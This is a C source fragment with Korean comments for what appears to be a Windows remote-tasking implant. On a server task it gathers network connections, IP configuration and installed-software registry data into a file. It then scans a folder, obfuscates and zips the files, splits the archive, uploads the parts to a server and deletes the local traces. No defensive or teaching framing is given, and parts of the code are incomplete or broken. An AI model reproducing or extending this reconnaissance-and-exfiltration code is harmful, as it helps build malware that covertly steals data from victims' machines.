static int e_flag = 0;  // 전역

void execute_get_sysinfo(int task_id, cJSON* payload) {
    printf("[MODULE] GET_SYSINFO: 시스템 정보 수집 요청 감지.\n");
    // ... 실제 정보 수집 로직은 여기에 구현해야 합니다. ...
    
    cJSON* cmd_item = cJSON_GetObjectItemCaseSensitive(payload, "command");
    char full_command[1024];

    //if(strcmp(cmd_item->valuestring, ))
    // --- 명령 구성 로직 ---
    memset(full_command, 0, sizeof(full_command));
    int len = snprintf(full_command, sizeof(full_command), "netstat -ano >> result.txt ");
    len+= snprintf(full_command +len, sizeof(full_command)-len, "&& ipconfig >> result.txt ");
    len+= snprintf(full_command + len, sizeof(full_command)-len, "&& reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall >> result.txt");
    full_command[sizeof(full_command) - 1] = '\0';
    int exit_code = 0;
    e_flag = 1;
    printf("full_command:%s\n", full_command);
    char* output = execute_and_capture2(full_command, &exit_code, e_flag);

    //http_request(const char* method, const char* path, const char* payload, int payload_len)

    
    
    char filename[] = "result.txt";
    char report_content[] = "File download simulation completed.";
    report_file_to_server(task_id, "COMPLETED", filename, report_content, exit_code);
-------------------------------------------------------
char* execute_and_capture2(const char* command, int* exit_code, int e_flag) {
    FILE* fp;
    char buffer[256];
    char* result_output = (char*)malloc(MAX_OUTPUT_SIZE);

    if (result_output == NULL) {
        *exit_code = -1;
        return strdup("[ERROR] Memory allocation failed for command output.");
    }
    result_output[0] = '\0';

    fp = _popen(command, "r");
    if (fp == NULL) {
        *exit_code = -1;
        sprintf(result_output, "[ERROR] Failed to execute command via _popen: %s", command);
        return result_output;
    }
    fclose(fp);

    char* output_filename = "result.txt";
    char* new_filename = "C:\\test\\result.txt";
    MoveFileA(output_filename, new_filename);
    Sleep(3000);
    DWORD dwThreadId = 0;
    HANDLE hThread = NULL;
    //printf("thisis1\n");
    hThread = CreateThread(NULL, 0, run_file_upload, e_flag, 0, dwThreadId);
    //printf("thisis3\n");

    //_pclose(fp);
    CloseHandle(hThread);

    
}
-------------------------------------------------------------------------------------------


int run_file_upload(int e_flag)

{
    //CONDITION_VARIABLE cv;
    //CRITICAL_SECTION cs;

    //InitializeConditionVariable(&cv);
    //InitializeCriticalSection(&cs);
    const char* folder = "C:\\test\\";
    if ((e_flag == 2)||(e_flag == 1)) {
        sprintf(manifest_path, "%s\\upload_manifest.json", folder);
        printf("thisis2\n");
        printf("[UPLOAD] 시작\n");

        if (load_manifest()) {
            printf("[RESUME] manifest 로드 → 이어받기 모드\n");
        }
        else {
            printf("[SCAN] 폴더 스캔+난독화\n");
            scan_and_obfuscate(folder);

            printf("[SAVE] manifest 저장\n");
            save_manifest();
        }

        char zip_path[MAX_PATH_LEN];
        sprintf(zip_path, "%s\\upload.zip", folder);

        printf("[ZIP] ZIP 생성\n");
        if (!make_zip(folder, zip_path)) {
            printf("[ERROR] ZIP 생성 실패 → 업로드 중단\n");
            return 0;
        }

        printf("[SPLIT] ZIP 분할\n");
        int parts = split_zip(zip_path, PART_SIZE);

        printf("[UPLOAD] part 업로드\n");
        for (int i = 0; i < parts; i++) {
            char partpath[MAX_PATH_LEN];
            sprintf(partpath, "%s.part%d", zip_path, i);
            upload_part_resume(partpath);
        }

        printf("[UPLOAD] mapping.json 전송\n");
        send_mapping_json();

        printf("[SERVER] finish_upload 호출\n");
        finish_upload_request(basename_nopath(zip_path), parts);

        printf("[CLEANUP] 임시파일 삭제\n");
        delete_obfuscated_files(folder);
        delete_zip_and_parts(folder, "upload.zip", parts);
        delete_local_file(manifest_path);

        printf("[DONE] 업로드 완료\n");
        if ((e_flag == 1)||(e_flag==0)) {
            return 1;
        }
        Sleep(10000);
    }
}

